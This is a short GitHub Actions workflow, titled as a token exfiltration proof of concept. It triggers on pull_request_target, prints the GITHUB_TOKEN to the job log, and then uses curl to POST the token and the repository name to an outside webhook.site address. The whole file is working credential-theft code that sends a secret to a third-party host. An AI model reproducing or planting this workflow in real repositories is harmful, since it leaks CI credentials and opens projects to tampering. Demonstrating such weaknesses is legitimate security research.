name: Token Exfiltration PoC

on:
  pull_request_target:

jobs:
  poc:
    runs-on: ubuntu-latest
    steps:
      - name: Dump GitHub Token
        run: |
          echo "Token:"
          echo $GITHUB_TOKEN

      - name: Exfiltrate token
        run: |
          curl -X POST https://webhook.site/66866cde-f5d2-4d0a-86b1-32ea88ae79af \
          -H "Content-Type: application/json" \
          -d "{\"token\":\"$GITHUB_TOKEN\",\"repo\":\"${{ github.repository }}\"}"
